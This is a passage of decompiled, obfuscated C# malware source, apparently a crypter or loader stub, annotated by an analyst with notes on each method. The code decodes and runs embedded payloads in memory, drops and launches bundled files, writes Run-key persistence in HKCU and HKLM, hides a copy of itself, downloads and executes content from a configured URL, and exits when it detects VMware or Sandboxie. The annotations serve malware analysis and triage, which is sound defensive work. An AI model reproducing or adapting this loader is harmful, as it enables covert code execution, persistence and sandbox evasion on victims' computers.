this.xpjiguggif5df23oi(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 16, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("CCSI0IZJHGS1OVNFRTEN3VJ02"))));
|
|
// Stage 2: payload from the resource identified by (44, decoded name).
this.Xvzsy20ikq50fiuzzzsw14i22 = this.idbm12rhs0k0m25by(executablePath, 44, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("BUEVDVEHTVBYWB1VY0OFU1FDB"));
|
|
if (this.Qeujo4xlzlmqxzlwt == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Xvzsy20ikq50fiuzzzsw14i22 = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(this.Xvzsy20ikq50fiuzzzsw14i22, this.Sqsgcrexehem0lg3mionbxiuw);
|
|
this.Xvzsy20ikq50fiuzzzsw14i22 = this.P2dz552iekyo3s3by(this.Xvzsy20ikq50fiuzzzsw14i22);
|
|
// Stage 3: flag false -> helper method invoked with (payload, host path, decoded empty string);
// flag true -> payload loaded and run as a managed assembly inside this process.
if (!this.Zx2ycojwb320y2n31)
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) this.Xvzsy20ikq50fiuzzzsw14i22,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
(object) Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("")
|
|
});
|
|
}
|
|
else
|
|
this.Qhlb0achfvgjxeekj(this.Xvzsy20ikq50fiuzzzsw14i22);
|
|
// Stage 4: optional on-disk copy of the payload, started immediately.
if (this.Kbkqxyuop35q5nercdcrjitsn)
|
|
this.Xu4noszs2jndqy0uakulzk0hj(this.Xvzsy20ikq50fiuzzzsw14i22, this.Ueczuk1jlbi3nbg5x2h1wuon0, true);
|
|
// Stage 5: install path = base folder [+ sub-folder + "\"] + file name; the sub-folder is created if configured.
string str;
|
|
if (!string.IsNullOrEmpty(this.Osbrxysckqx0aqx1lzguqifvs))
|
|
{
|
|
str = this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + this.Ifbnriw30u3zqko1o;
|
|
Directory.CreateDirectory(this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs);
|
|
}
|
|
else
|
|
str = this.O52jpa3c1kjywan03 + this.Ifbnriw30u3zqko1o;
|
|
// Each enabled switch registers the install path through one persistence mode (HKCU value, HKLM value, HKLM subkey).
if (this.N4rfcpacyzvdyb5o5pseuwja0 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str, 1);
|
|
if (this.ovvhzz3v4t0lncqhc == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.wlzgy5x503ocrxvto, str, 2);
|
|
if (this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Ouyjahe11vseyu1gc, this.mlzo2db1vixlaay2xx3qm1uh1, str, 3);
|
|
// Self-copy happens only if at least one persistence mode ran; an existing file at the path is not overwritten.
if (this.n2gipyxzj1jd3ijqb)
|
|
{
|
|
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
|
|
if (!System.IO.File.Exists(str))
|
|
System.IO.File.WriteAllBytes(str, bytes);
|
|
if (System.IO.File.Exists(str))
|
|
{
|
|
if (this.aebl4g0r22vys142j542rkxik == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
|
|
if (this.Pi5xwja3tpz1vyvxe0bvaszsw == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
|
|
if (this.W0igi2snxiuevrujvdeszp1bxkguemxod == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
|
|
}
|
|
}
|
|
// Stage 6: list of additional bundled files from the resource identified by (47, decoded name).
this.ulry4uhtwnw50g04z(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 47, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("AHAAJWFXQRWK55DBF5CZOY25NAJ1XU0TF"))));
|
|
// Stage 7: outbound request to the configured URL; the response body is treated as executable content.
if (this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q)
|
|
this.fyld3x5pir2kaoksligurapzj(new WebClient().DownloadData(new Uri(this.upzpncz1hdeloi5k3rlq4a14w)));
|
|
// Stage 8: does not return under normal operation (see persistenceStartup).
this.persistenceStartup(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(ex.Message);
|
|
}
|
|
}
|
|
|
|
// Analyst note: thread body for in-process execution of a managed payload. The argument is cast to
// byte[], loaded with Assembly.Load (from memory, no file on disk), and its EntryPoint is invoked
// with an empty string[] when it takes one parameter, or with no arguments otherwise. Any
// exception clears the static success flag Vyydwy2dzohvetixn.
// Triage hint: assemblies loaded this way have no backing file path in the process's loaded-module list.
private static void pq0wico5ukmaxyfwlssnrl0r1nqartkt4(object Qilit4odml3450ffdduw5begg)
|
|
{
|
|
try
|
|
{
|
|
MethodInfo entryPoint = Assembly.Load((byte[]) Qilit4odml3450ffdduw5begg).EntryPoint;
|
|
if (entryPoint.GetParameters().Length == 1)
|
|
entryPoint.Invoke((object) null, new object[1]
|
|
{
|
|
(object) new string[0]
|
|
});
|
|
else
|
|
entryPoint.Invoke((object) null, (object[]) null);
|
|
}
|
|
catch
|
|
{
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
|
|
}
|
|
}
|
|
|
|
// Analyst note: returns the full contents of a named manifest resource of the executing assembly.
// The stream is copied in 1024-byte chunks into a MemoryStream until Read returns 0 or less, and
// the accumulated bytes are returned as an array. Both streams are disposed by the using blocks.
// The only caller in this file uses it to fetch the embedded helper assembly.
public static byte[] q1cagpbvwn04kmqyi(string lhs5nwmsu4p3h3rgf)
|
|
{
|
|
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(lhs5nwmsu4p3h3rgf))
|
|
{
|
|
byte[] buffer = new byte[1024];
|
|
using (MemoryStream memoryStream = new MemoryStream())
|
|
{
|
|
while (true)
|
|
{
|
|
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
|
|
if (count > 0)
|
|
memoryStream.Write(buffer, 0, count);
|
|
else
|
|
break;
|
|
}
|
|
return memoryStream.ToArray();
|
|
}
|
|
}
|
|
}
|
|
|
|
// Analyst note: P/Invoke declaration for kernel32!GetModuleHandle. Main is its only caller in this
// file and uses the returned handle to test whether a named DLL is loaded in the current process.
[DllImport("kernel32.dll")]
|
|
public static extern IntPtr GetModuleHandle(string lpModuleName);
|
|
|
|
// Analyst note: entry point. Two analysis-environment checks run before anything else; each one
// shows a message box and exits with code 0 when it matches, so the sample does nothing further
// in those environments:
//   1. every instance of a WMI class is enumerated and a named property, trimmed and lower-cased,
//      is searched for a substring;
//   2. GetModuleHandle is called for a named DLL and a non-zero handle counts as a match.
// If neither matches, a new instance is created and bocln5xhicnup1rlmeg3v0wq5fq30ikg2 is run.
// NOTE(review): the string decoder is not in this file; if it de-interleaves (even positions first,
// then odd), the WMI class reads "Win32_Bios", the property "SerialNumber", the substring
// "vmware" and the DLL "SbieDll.dll" - confirm. A clean run in a VM or sandbox is therefore not
// evidence that the sample is benign.
private static void Main(string[] args)
|
|
{
|
|
string empty = string.Empty;
|
|
foreach (ManagementBaseObject instance in new ManagementClass(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Wn2Boi3_is")).GetInstances())
|
|
{
|
|
if (instance.Properties[Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Sranmeeilubr")].Value.ToString().Trim().ToLower().IndexOf(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vwrmae")) > -1)
|
|
{
|
|
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u navrulmcieevrnethsapiaincno erni ita ahn niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("VrulMcieDtceita ahn eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
|
|
Environment.Exit(0);
|
|
}
|
|
}
|
|
if (Xcpjaqmaubj2y0o3n.GetModuleHandle(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SiDldlbel.l")).ToInt32() != 0)
|
|
{
|
|
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u naSnbxeevrnethsapiaincno erni adoi niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SnbxeDtceadoi eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
|
|
Environment.Exit(0);
|
|
}
|
|
new Xcpjaqmaubj2y0o3n().bocln5xhicnup1rlmeg3v0wq5fq30ikg2();
|
|
}
|
|
|
|
// Analyst note: processes the list of additional files bundled with the sample. The input string is
// split into entries on one marker; each entry is split into fields on a second marker. The loop
// starts at index 1 and stops before the last element, so the first and last pieces are skipped.
// Per entry, the fields are: [1] encoded bytes (decoded by rzo4euwupytyapwx03g5pnbwx.fuwrggsyeop321rci,
// defined outside this file), [2] file name, [3] run-in-memory flag, [4] folder token, [5] apply
// byte transform, [6] GZip-compressed, [7] decompressed size, [8] run as managed assembly.
//   [3] true : optionally decompress and transform, then either invoke the embedded helper with
//              (bytes, host path, null) or, when [8] is true, load and run in-process.
//   [3] false: optionally transform, write to <resolved folder><file name> and start it.
// Failures in the in-memory paths are only printed to the console.
private void ulry4uhtwnw50g04z(string xkcps1zic2cskbd1y)
|
|
{
|
|
string[] separator1 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Qslygidk2ydujmodz1hnjxa40is244mdu")
|
|
};
|
|
string[] separator2 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("swmnvnjfto3vjpznbcurldfzy")
|
|
};
|
|
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
|
|
// The three locals below are never read.
string empty1 = string.Empty;
|
|
string empty2 = string.Empty;
|
|
string empty3 = string.Empty;
|
|
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
|
|
{
|
|
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
|
|
byte[] numArray = rzo4euwupytyapwx03g5pnbwx.fuwrggsyeop321rci(strArray2[1]);
|
|
string str1 = strArray2[2];
|
|
bool boolean1 = Convert.ToBoolean(strArray2[3]);
|
|
string Ibpa121djgybg55fkysgepjc0y2qiasb2 = strArray2[4];
|
|
bool boolean2 = Convert.ToBoolean(strArray2[5]);
|
|
bool boolean3 = Convert.ToBoolean(strArray2[6]);
|
|
int int32 = Convert.ToInt32(strArray2[7]);
|
|
bool boolean4 = Convert.ToBoolean(strArray2[8]);
|
|
// Folder token resolved to a concrete directory (see yti5olupwaivlclet).
string str2 = this.yti5olupwaivlclet(Ibpa121djgybg55fkysgepjc0y2qiasb2);
|
|
if (boolean1)
|
|
{
|
|
if (boolean3)
|
|
numArray = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(numArray, int32);
|
|
if (boolean2)
|
|
numArray = this.P2dz552iekyo3s3by(numArray);
|
|
if (!boolean4)
|
|
{
|
|
try
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) numArray,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
null
|
|
});
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl nommr:ro netn on ieit eoy ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
|
|
}
|
|
}
|
|
else if (!this.Qhlb0achfvgjxeekj(numArray))
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl sn elcin ro netn on ieuigrfeto:"));
|
|
}
|
|
else
|
|
{
|
|
// On-disk path: this entry leaves a file at the resolved folder and a child process started from it.
string Dutorh5b0eqbkqejp = str2 + str1;
|
|
if (boolean2)
|
|
numArray = this.P2dz552iekyo3s3by(numArray);
|
|
this.Xu4noszs2jndqy0uakulzk0hj(numArray, Dutorh5b0eqbkqejp, true);
|
|
}
|
|
}
|
|
}
|
|
|
|
// Analyst note: runs pq0wico5ukmaxyfwlssnrl0r1nqartkt4 (in-memory assembly load + entry-point call)
// on a new thread set to the STA apartment state, passing the byte array as the thread argument,
// and blocks until that thread finishes. Any exception raised while creating, starting or joining
// the thread clears the static success flag Vyydwy2dzohvetixn.
private static void ooaqlrxjthzq5ykyeqamxwsxh(byte[] Amqk5npffix20x5qn5x2vnb3b)
|
|
{
|
|
try
|
|
{
|
|
Thread thread = new Thread(new ParameterizedThreadStart(Xcpjaqmaubj2y0o3n.pq0wico5ukmaxyfwlssnrl0r1nqartkt4));
|
|
thread.SetApartmentState(ApartmentState.STA);
|
|
thread.Start((object) Amqk5npffix20x5qn5x2vnb3b);
|
|
thread.Join();
|
|
}
|
|
catch
|
|
{
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
|
|
}
|
|
}
|
|
|
|
// Analyst note: resolves a folder token from the configuration to a concrete directory path. The
// input is compared against seven decoded token strings in turn; the replacement used for each is
// visible in the branch bodies, in this order: the application's startup path, the temp path, the
// ApplicationData folder, the Personal (documents) folder, the Desktop folder, the value of an
// environment variable, and the ProgramFiles folder. All but the temp path get a separator
// appended. An unrecognised token is returned unchanged.
// NOTE(review): the environment variable name presumably decodes to "USERPROFILE" - confirm
// against the decoder, which is defined outside this file.
// Triage hint: these are the candidate drop locations for the payload and the bundled files.
private string yti5olupwaivlclet(string Ibpa121djgybg55fkysgepjc0y2qiasb2)
|
|
{
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApiainPtplcto ah"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Application.StartupPath + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Tmep"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Path.GetTempPath();
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApaapDt"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("M ouetyDcmns"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Dstpeko"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ue rflsrPoie"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("UEPOIESRRFL")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("PormFlsrga ie"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
return Ibpa121djgybg55fkysgepjc0y2qiasb2;
|
|
}
|
|
}
|
|
}
|